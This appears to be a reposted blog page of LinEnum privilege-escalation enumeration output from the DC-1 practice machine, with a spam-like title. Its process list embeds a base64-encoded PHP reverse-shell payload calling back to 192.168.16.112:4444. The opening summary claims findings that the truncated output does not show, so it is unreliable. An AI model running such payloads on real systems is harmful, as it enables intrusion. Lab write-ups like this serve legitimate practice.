m.555lu.co/vlist.php_vunlhub-DC-1-LinuxSuid提权

于 2020-12-30 23:52:53 发布
阅读量1.7w 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: m.555lu.co/vlist.php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33308985/article/details/112808172
这是一个本地Linux枚举和提权脚本的执行报告,详细列出了系统的详细信息,包括内核信息、用户/组信息、环境变量、软件版本等。报告中还发现了几个具有潜在权限提升可能的SUID文件,如/bin/find,这可能为系统提权提供机会。此外,还列出了/home目录的权限情况,发现root用户可以通过SSH登录,并且存在一些敏感文件可供读写,如/etc/passwd。最后,报告未搜索到含有特定关键字的.conf、.php、.log和.ini文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1 [00;31m######################################################### [00m

2 [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script [00m [00;31m# [00m

3 [00;31m######################################################### [00m

4 [00;33m#www.rebootuser.com [00m

5 [00;33m#version 0.95 [00m

6

7 [-] Debug Info8 [00;33m[+] Thorough tests =Disabled [00m9

10

11 [00;33mScan started at:

12 Tue May 7 01:08:48 AEST 2019

13 [00m14

15 [00;33m### SYSTEM ############################################## [00m

16 [00;31m[-] Kernel information:[00m17 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

18

19

20 [00;31m[-] Kernel information (continued):[00m21 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1

22

23

24 [00;31m[-] Specific release information:[00m25 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"

26 NAME="Debian GNU/Linux"

27 VERSION_ID="7"

28 VERSION="7 (wheezy)"

29 ID=debian30 ANSI_COLOR="1;31"

31 HOME_URL="http://www.debian.org/"

32 SUPPORT_URL="http://www.debian.org/support/"

33 BUG_REPORT_URL="http://bugs.debian.org/"

34

35

36 [00;31m[-] Hostname:[00m37 DC-1

38

39

40 [00;33m### USER/GROUP ########################################## [00m

41 [00;31m[-] Current user/group info:[00m42 uid=33(www-data) gid=33(www-data) groups=33(www-data)43

44

45 [00;31m[-] Users that have previously logged onto the system:[00m46 Username Port From Latest47 root tty1 Thu Feb 28 12:10:51 +1000 2019

48

49

50 [00;31m[-] Who else is logged on:[00m51 01:08:48 up 1:00, 0 users, load average: 0.00, 0.00, 0.00

52 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT53

54

55 [00;31m[-] Group memberships:[00m56 uid=0(root) gid=0(root) groups=0(root)57 uid=1(daemon) gid=1(daemon) groups=1(daemon)58 uid=2(bin) gid=2(bin) groups=2(bin)59 uid=3(sys) gid=3(sys) groups=3(sys)60 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)61 uid=5(games) gid=60(games) groups=60(games)62 uid=6(man) gid=12(man) groups=12(man)63 uid=7(lp) gid=7(lp) groups=7(lp)64 uid=8(mail) gid=8(mail) groups=8(mail)65 uid=9(news) gid=9(news) groups=9(news)66 uid=10(uucp) gid=10(uucp) groups=10(uucp)67 uid=13(proxy) gid=13(proxy) groups=13(proxy)68 uid=33(www-data) gid=33(www-data) groups=33(www-data)69 uid=34(backup) gid=34(backup) groups=34(backup)70 uid=38(list) gid=38(list) groups=38(list)71 uid=39(irc) gid=39(irc) groups=39(irc)72 uid=41(gnats) gid=41(gnats) groups=41(gnats)73 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)74 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)75 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)76 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)77 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)78 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)79 uid=105(mysql) gid=109(mysql) groups=109(mysql)80 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)81

82

83 [00;31m[-] Contents of /etc/passwd:[00m84 root:x:0:0:root:/root:/bin/bash85 daemon:x:1:1:daemon:/usr/sbin:/bin/sh86 bin:x:2:2:bin:/bin:/bin/sh87 sys:x:3:3:sys:/dev:/bin/sh88 sync:x:4:65534:sync:/bin:/bin/sync89 games:x:5:60:games:/usr/games:/bin/sh90 man:x:6:12:man:/var/cache/man:/bin/sh91 lp:x:7:7:lp:/var/spool/lpd:/bin/sh92 mail:x:8:8:mail:/var/mail:/bin/sh93 news:x:9:9:news:/var/spool/news:/bin/sh94 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh95 proxy:x:13:13:proxy:/bin:/bin/sh96 www-data:x:33:33:www-data:/var/www:/bin/sh97 backup:x:34:34:backup:/var/backups:/bin/sh98 list:x:38:38:Mailing List Manager:/var/list:/bin/sh99 irc:x:39:39:ircd:/var/run/ircd:/bin/sh100 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh101 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh102 libuuid:x:100:101::/var/lib/libuuid:/bin/sh103 Debian-exim:x:101:104::/var/spool/exim4:/bin/false

104 statd:x:102:65534::/var/lib/nfs:/bin/false

105 messagebus:x:103:107::/var/run/dbus:/bin/false

106 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin107 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false

108 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash109

110

111 [00;31m[-] Super user account(s):[00m112 root113

114

115 [00;31m[-] Are permissions on /home directories lax:[00m116 total 12K117 drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .

118 drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..

119 drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28flag4120

121

122 [00;31m[-] Root is allowed to login via SSH:[00m123 PermitRootLogin yes124

125

126 [00;33m### ENVIRONMENTAL ####################################### [00m

127 [00;31m[-] Environment information:[00m128 APACHE_PID_FILE=/var/run/apache2.pid129 APACHE_RUN_USER=www-data130 APACHE_LOG_DIR=/var/log/apache2131 PATH=/usr/local/bin:/usr/bin:/bin132 PWD=/var/www133 APACHE_RUN_GROUP=www-data134 LANG=C135 SHLVL=1

136 APACHE_LOCK_DIR=/var/lock/apache2137 APACHE_RUN_DIR=/var/run/apache2138 _=/usr/bin/env139

140

141 [00;31m[-] Path information:[00m142 /usr/local/bin:/usr/bin:/bin143

144

145 [00;31m[-] Available shells:[00m146 #/etc/shells: valid login shells

147 /bin/sh148 /bin/dash149 /bin/bash150 /bin/rbash151

152

153 [00;31m[-] Current umask value:[00m154 0022

155 u=rwx,g=rx,o=rx156

157

158 [00;31m[-] umask value as specified in /etc/login.defs:[00m159 UMASK 022

160

161

162 [00;31m[-] Password and storage information:[00m163 PASS_MAX_DAYS 99999

164 PASS_MIN_DAYS 0

165 PASS_WARN_AGE 7

166 ENCRYPT_METHOD SHA512167

168

169 [00;33m### JOBS/TASKS ########################################## [00m

170 [00;31m[-] Cron jobs:[00m171 -rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab172

173 /etc/cron.d:

174 total 16

175 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .

176 drwxr-xr-x 85 root root 4096 May 7 00:08 ..

177 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder178 -rw-r--r-- 1 root root 510 May 10 2018php5179

180 /etc/cron.daily:

181 total 68

182 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .

183 drwxr-xr-x 85 root root 4096 May 7 00:08 ..

184 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder185 -rwxr-xr-x 1 root root 633 May 30 2018apache2186 -rwxr-xr-x 1 root root 14985 Oct 24 2014apt187 -rwxr-xr-x 1 root root 314 Nov 5 2012aptitude188 -rwxr-xr-x 1 root root 355 Jun 11 2012bsdmainutils189 -rwxr-xr-x 1 root root 256 May 3 2016dpkg190 -rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base191 -rwxr-xr-x 1 root root 89 May 17 2012logrotate192 -rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db193 -rwxr-xr-x 1 root root 606 Sep 25 2010mlocate194 -rwxr-xr-x 1 root root 249 May 26 2012passwd195

196 /etc/cron.hourly:

197 total 12

198 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .

199 drwxr-xr-x 85 root root 4096 May 7 00:08 ..

200 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder201

202 /etc/cron.monthly:

203 total 12

204 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .

205 drwxr-xr-x 85 root root 4096 May 7 00:08 ..

206 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder207

208 /etc/cron.weekly:

209 total 16

210 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .

211 drwxr-xr-x 85 root root 4096 May 7 00:08 ..

212 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder213 -rwxr-xr-x 1 root root 907 Jun 19 2012 man-db214

215

216 [00;31m[-] Crontab contents:[00m217 #/etc/crontab: system-wide crontab

218 #Unlike any other crontab you don't have to run the `crontab'

219 #command to install the new version when you edit this file

220 #and files in /etc/cron.d. These files also have username fields,

221 #that none of the other crontabs do.

222

223 SHELL=/bin/sh224 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin225

226 #m h dom mon dow user command

227 17 * * * * root cd / && run-parts --report /etc/cron.hourly228 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )229 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )230 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )231 #232

233

234 [00;33m### NETWORKING ########################################## [00m

235 [00;31m[-] Network and IP info:[00m236 eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98

237 inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0

238 inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link239 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

240 RX packets:8702 errors:0 dropped:0 overruns:0 frame:0

241 TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0

242 collisions:0 txqueuelen:1000

243 RX bytes:1325354 (1.2 MiB) TX bytes:1103771 (1.0MiB)244

245 lo Link encap:Local Loopback246 inet addr:127.0.0.1 Mask:255.0.0.0

247 inet6 addr: ::1/128 Scope:Host248 UP LOOPBACK RUNNING MTU:16436 Metric:1

249 RX packets:50 errors:0 dropped:0 overruns:0 frame:0

250 TX packets:50 errors:0 dropped:0 overruns:0 carrier:0

251 collisions:0 txqueuelen:0

252 RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7KiB)253

254

255 [00;31m[-] ARP history:[00m256 192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95REACHABLE257 192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE258

259

260 [00;31m[-] Nameserver(s):[00m261 nameserver 192.168.16.254

262 nameserver 0.0.0.0

263

264

265 [00;31m[-] Default route:[00m266 default via 192.168.16.254dev eth0267

268

269 [00;31m[-] Listening TCP:[00m270 Active Internet connections (servers and established)271 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name272 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -

273 tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -

274 tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -

275 tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -

276 tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -

277 tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php278 tcp6 0 0 :::22 :::* LISTEN -

279 tcp6 0 0 ::1:25 :::* LISTEN -

280 tcp6 0 0 :::34190 :::* LISTEN -

281 tcp6 0 0 :::111 :::* LISTEN -

282 tcp6 0 0 :::80 :::* LISTEN -

283 tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -

284 tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT -

285

286

287 [00;31m[-] Listening UDP:[00m288 Active Internet connections (servers and established)289 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name290 udp 0 0 0.0.0.0:59942 0.0.0.0:* -

291 udp 0 0 0.0.0.0:68 0.0.0.0:* -

292 udp 0 0 0.0.0.0:111 0.0.0.0:* -

293 udp 0 0 0.0.0.0:769 0.0.0.0:* -

294 udp 0 0 127.0.0.1:801 0.0.0.0:* -

295 udp 0 0 0.0.0.0:21881 0.0.0.0:* -

296 udp6 0 0 :::52815 :::* -

297 udp6 0 0 :::28256 :::* -

298 udp6 0 0 :::111 :::* -

299 udp6 0 0 :::769 :::* -

300

301

302 [00;33m### SERVICES ############################################# [00m

303 [00;31m[-] Running processes:[00m304 USER PID %CPU %MEM VSZ RSS TTY STAT START TIMECOMMAND305 root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]306 root 2 0.0 0.0 0 0 ? S 00:08 0:00[kthreadd]307 root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]308 root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]309 root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]310 root 7 0.0 0.0 0 0 ? S< 00:08 0:00[cpuset]311 root 8 0.0 0.0 0 0 ? S< 00:08 0:00[khelper]312 root 9 0.0 0.0 0 0 ? S 00:08 0:00[kdevtmpfs]313 root 10 0.0 0.0 0 0 ? S< 00:08 0:00[netns]314 root 11 0.0 0.0 0 0 ? S 00:08 0:00[sync_supers]315 root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]316 root 13 0.0 0.0 0 0 ? S< 00:08 0:00[kintegrityd]317 root 14 0.0 0.0 0 0 ? S< 00:08 0:00[kblockd]318 root 15 0.0 0.0 0 0 ? S 00:08 0:00[khungtaskd]319 root 16 0.0 0.0 0 0 ? S 00:08 0:00[kswapd0]320 root 17 0.0 0.0 0 0 ? SN 00:08 0:00[ksmd]321 root 18 0.0 0.0 0 0 ? S 00:08 0:00[fsnotify_mark]322 root 19 0.0 0.0 0 0 ? S< 00:08 0:00[crypto]323 root 95 0.0 0.0 0 0 ? S 00:08 0:00[khubd]324 root 105 0.0 0.0 0 0 ? S< 00:08 0:00[ata_sff]325 root 115 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_0]326 root 125 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_1]327 root 134 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_2]328 root 135 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_3]329 root 136 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_4]330 root 137 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_5]331 root 138 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_6]332 root 139 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_7]333 root 140 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_8]334 root 141 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_9]335 root 142 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_10]336 root 143 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_11]337 root 144 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_12]338 root 145 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_13]339 root 146 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_14]340 root 147 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_15]341 root 148 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_16]342 root 149 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_17]343 root 150 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_18]344 root 151 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_19]345 root 152 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_20]346 root 153 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_21]347 root 154 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_22]348 root 155 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_23]349 root 156 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_24]350 root 157 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_25]351 root 158 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_26]352 root 159 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_27]353 root 160 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_28]354 root 161 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_29]355 root 162 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_30]356 root 163 0.0 0.0 0 0 ? S 00:08 0:00[scsi_eh_31]357 root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]358 root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]359 root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]360 root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]361 root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon362 root 543 0.0 0.0 0 0 ? S< 00:08 0:00[ttm_swap]363 root 699 0.0 0.0 0 0 ? S< 00:08 0:00[kpsmoused]364 root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w365 statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd366 root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon367 root 1903 0.0 0.0 0 0 ? S< 00:08 0:00[rpciod]368 root 1905 0.0 0.0 0 0 ? S< 00:08 0:00[nfsiod]369 root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd370 root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5371 root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid372 root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start373 daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd374 103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system

375 www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start376 www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start377 www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start378 www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start379 root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron380 root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe381 mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306

382 root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error383 101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m384 root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400tty2385 root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400tty3386 root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400tty4387 root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400tty5388 root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400tty6389 root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]390 root 3298 0.0 0.2 5196 2320 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0391 root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd392 root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400tty1393 www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start394 www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start395 www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start396 www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start397 www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start398 www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start399 www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'

400 www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));401 www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh402 www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh403 root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]404 root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]405 www-data 4398 0.0 0.1 3500 1764 ? S 01:08 0:00 /bin/bash ./LinEnum.sh406 www-data 4399 0.0 0.1 3552 1380 ? S 01:08 0:00 /bin/bash ./LinEnum.sh407 www-data 4400 0.0 0.0 1876 452 ? S 01:08 0:00 tee -a408 www-data 4570 0.0 0.1 3536 1092 ? S 01:08 0:00 /bin/bash ./LinEnum.sh409 www-data 4571 0.0 0.0 2832 996 ? R 01:08 0:00ps aux410

411

412 [00;31m[-] Process binaries and associated permissions (from above list):[00m413 -rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash414 lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh ->dash415 -rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty416 -rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd417 -rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind418 -rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon419 -rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid420 lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2421 -rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd422 -rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron423 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4424 -rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld425 -rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd426 -rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd427 -rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd428

429

430 [00;31m[-] /etc/init.d/ binary permissions:[00m431 total 280

432 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .

433 drwxr-xr-x 85 root root 4096 May 7 00:08 ..

